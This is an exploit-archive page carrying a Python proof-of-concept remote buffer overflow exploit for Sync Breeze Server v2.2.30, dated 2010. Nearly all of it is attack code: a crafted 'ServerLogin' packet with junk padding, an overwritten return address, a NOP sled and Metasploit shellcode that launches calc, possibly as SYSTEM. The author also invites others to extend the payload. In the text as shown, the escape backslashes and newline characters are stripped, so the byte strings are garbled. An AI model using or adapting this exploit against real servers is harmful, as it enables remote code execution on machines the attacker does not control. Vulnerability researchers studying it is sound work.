[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sync Breeze Server v2.2.30 Remote Buffer Overflow Exploit
# Published : 2010-10-11
# Author : xsploited security
# Previous Title : AoA Audio Extractor v2.x ActiveX ROP exploit
# Next Title : Oracle Virtual Server Agent Command Injection
#!/usr/bin/python
# Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit
# Date: 10/10/2010
# Author: Xsploited Security [aka xsploitedsec]
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v2.2.30.exe
# Version: v2.2.30 (Others are most likely effected as well)
# Tested on: A Windows XP SP3 machine
# CVE : N/A
### Vulnerability Information: ###
# A vulnerability exists in the way Sync Breeze v2.2.30 processes its login requests after accepting a connection from a remote client.
# If a packet with a length greater than 484 bytes is received with the command prefix "ServerLogin." the effected Service (syncbrs.exe)
# will crash, from the result of a buffer overflow. An attacker can easily leverage this vulnerability and control execution flow /
# execute arbitrary code.
###
# This PoCs Usage:
# 1. Verify that the service is running on the remote machine, the default port is 9121.
# 2. Execute syncbreeze.py against the host
# 3. Check remote machines process list for calc to verify successful command execution. (Running as SYSTEM, on my test machine at least..)
###
# Other notes:
# If the software is installed from an administrator account, shellcode will be executed at admin / (system) level. This could be a potential
# privelage escilation attack vector (although I have not verified this yet)
# I am sure a lot more can be done with this (fit more shellcode, universal etc.) I'll leave that up to researchers however.
# Have fun!
###
### Shouts:
# kAoTiX - Helping me verify this bug/exploit
# MAX - Keeps me entertained, makes me giggle
# CorelanCoder - Your tutorials are absolutely fking awesome
# exploit-db, offensive-sec, packetstormsecurity and all security teams and sites!
###
import sys,socket
if len(sys.argv) != 2:
print "[!] Usage: ./syncbreeze.py <Target IP>"
sys.exit(1)
about = "=================================================n"
about += "Title: Sync Breeze Server v2.2.30 Remote BOF PoCn"
about += "Author: xsploited securitynURL: http://www.x-sploited.com/n"
about += "Contact: xsploitedsecurity [at] gmail.comn"
about += "=================================================n"
print about
host = sys.argv[1]
port = 9121 #default server port, unchangeable (I think)
# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = ("x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13x97x8c"
"x8ax10x83xebxfcxe2xf4x6bx64x03x10x97x8cxeax99"
"x72xbdx58x74x1cxdexbax9bxc5x80x01x42x83x07xf8"
"x38x98x3bxc0x36xa6x73xbbxd0x3bxb0xebx6cx95xa0"
"xaaxd1x58x81x8bxd7x75x7cxd8x47x1cxdex9ax9bxd5"
"xb0x8bxc0x1cxccxf2x95x57xf8xc0x11x47xdcx01x58"
"x8fx07xd2x30x96x5fx69x2cxdex07xbex9bx96x5axbb"
"xefxa6x4cx26xd1x58x81x8bxd7xafx6cxffxe4x94xf1"
"x72x2bxeaxa8xffxf2xcfx07xd2x34x96x5fxecx9bx9b"
"xc7x01x48x8bx8dx59x9bx93x07x8bxc0x1exc8xaex34"
"xccxd7xebx49xcdxddx75xf0xcfxd3xd0x9bx85x67x0c"
"x4dxfdx8dx07x95x2ex8cx8ax10xc7xe4xbbx9bxf8x0b"
"x75xc5x2cx72x84x22x7dxe4x2cx85x2ax11x75xc5xab"
"x8axf6x1ax17x77x6ax65x92x37xcdx03xe5xe3xe0x10"
"xc4x73x5fx73xf6xe0xe9x10");
# Begin payload buffer:
packet_header = ("x53x65x72x76x65x72x4Cx6Fx67x69x6Ex02");
junk = "x90" * 256; #265 byte junk buffer to reach eip
eip = "xFBxF8xABx71"; #jmp esp (via ws2_32.dll)
nops = "x90" * 12; #small nop sled
# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]
packet = packet_header + junk + eip + nops + calc + nops + nops;
print "[*] Connecting to " + host + "...r"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print "[*] Connected, Sending payloadr"
s.send(packet + "rn")
print "[*] Payload sent successfully"
print "[*] Check the resultsr"
s.close()